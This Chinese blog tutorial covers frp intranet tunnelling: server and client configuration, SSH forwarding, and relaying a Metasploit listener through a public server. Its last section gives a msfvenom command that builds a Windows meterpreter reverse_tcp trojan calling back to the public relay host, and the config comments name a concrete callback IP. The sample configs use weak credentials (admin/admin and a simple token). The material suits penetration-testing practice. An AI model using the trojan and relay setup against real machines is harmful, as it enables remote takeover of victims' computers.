• frp内网穿透教程2022最新(含内网ssh配置与msf联动配置)


    1、frp简介

    frp是一个高性能的反向代理应用,可以帮助您轻松地进行内网穿透,对外网提供服务, 支持tcp, udp, http,https等协议类型,并且web服务支持根据域名进行路由转发。

    1.1 为什么要使用frp

    两台不同内网的机器,是没有办法直接进行访问的,通过配置frp内网穿透,可以实现将2台不同内网的机器实现互联

    1.2 使用frp之前

    一定要有一个公网的ip,去买个云服务器就行,企鹅云的服务器现在新用户也就65一个月

    1.3 frp下载地址

    https://github.com/fatedier/frp/releases

    根据不同的系统需求,下载不同的frp版本就行,linux就下载如下图所示的版本
    在这里插入图片描述

    2、frp的配置与使用,配置的过程分为两个部分,一是服务器端(外网服务器)的配置;二是客户端(内网服务器)配置。

    2.1配置服务端

    将下载好后的frp文件上传到服务器,使用如下命令解压

    tar -zxvf frp_0.44.0_linux_amd64.tar.gz
    
    • 1

    在这里插入图片描述
    之后使用cd命令进入解压之后的文件夹

    cd frp_0.44.0_linux_amd64/
    
    • 1

    使用vim frps.ini命令进入编辑模式,写入如下信息

    [common]
    # frp监听的端口,默认是7000
    bind_port = 7000
    # 授权码
    token =aini123
    # 这个token之后在客户端会用到
    
    # frp管理后台端口
    dashboard_port = 8000
    # frp管理后台用户名和密码
    dashboard_user = admin
    dashboard_pwd = admin
    enable_prometheus = true
    
    # frp日志配置
    log_file = /var/log/frps.log
    log_level = info
    log_max_days = 3
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18

    配置完成后如下图
    在这里插入图片描述
    启动frp服务

    ./frps -c ./frps.ini
    
    • 1

    启动成功如下图
    在这里插入图片描述
    之后输入服务端ip:8000能出现如下页面,就说明配置完成了
    在这里插入图片描述

    2.2配置客户端

    同上方法,在客户端上传解压文件,进入解压的文件夹

    使用vim frpc.ini 编辑客户端配置文件,内容如下

    # 客户端配置
    [common]
    server_addr = 服务器的ip
     # 与frps.ini的bind_port一致
    server_port = 7000
     # 与frps.ini的token一致
    token =aini123
    
    # 配置msf服务
    [msf]
    type = tcp
    local_ip = 127.0.0.1
    local_port = 5555 
    #转发给本机的 5555   本地msf监听127.0.0.1:5555端口
    remote_port = 6000 
    #服务端用 6000 端口转发给本机   
    #木马程序的shell返回地址应该是175.24.230.65:6000,然后服务器会将6000的值转发给本地5555端口
    
    # 配置ssh服务
    [ssh]
    type = tcp
    local_ip =127.0.0.1
    local_port =22
    remote_port =6001
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24

    配置好后如下图:
    在这里插入图片描述
    使用./frpc -c ./frpc.ini命令启动客户端,会出现如下连接成功的显示,如果连接失败,记得注释不要和配置代码放同一行就不会报错了

    3、测试ssh连接

    因为前面设置的ssh连接remote_port转发端口为6001,所以我们只需要连接外网服务器的6001端口,就能连接上客户端的ssh
    在这里插入图片描述
    连接成功
    在这里插入图片描述

    4、测试msf连接

    msf制作一个反弹木马

    msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=公网ip lport=6000 --platform win -f exe -o msf.exe
    
    • 1

    msf设置监听5555端口
    在这里插入图片描述
    靶机打开反弹连接的木马,成功获取shell
    在这里插入图片描述

  • 相关阅读:
    Redis巡检检查 redis-check-aof
    Redis集群高可用环境之哨兵机制(12)
    只听过 Python 做爬虫?不瞒你说 Java 也很强
    推荐系统[八]算法实践总结V1:淘宝逛逛and阿里飞猪个性化推荐:召回算法实践总结【冷启动召回、复购召回、用户行为召回等算法实战】
    2023-python-解释器是什么东西?
    Linux系统上非管理员如何启动EasyDSS视频直播点播程序?
    智能决策:数字孪生的商业洞察
    I. Invoking the Magic(并查集+unordered_map)
    Linux之Shell基础入门
    Go Web——http标准库
  • 原文地址:https://blog.csdn.net/qq1140037586/article/details/126625509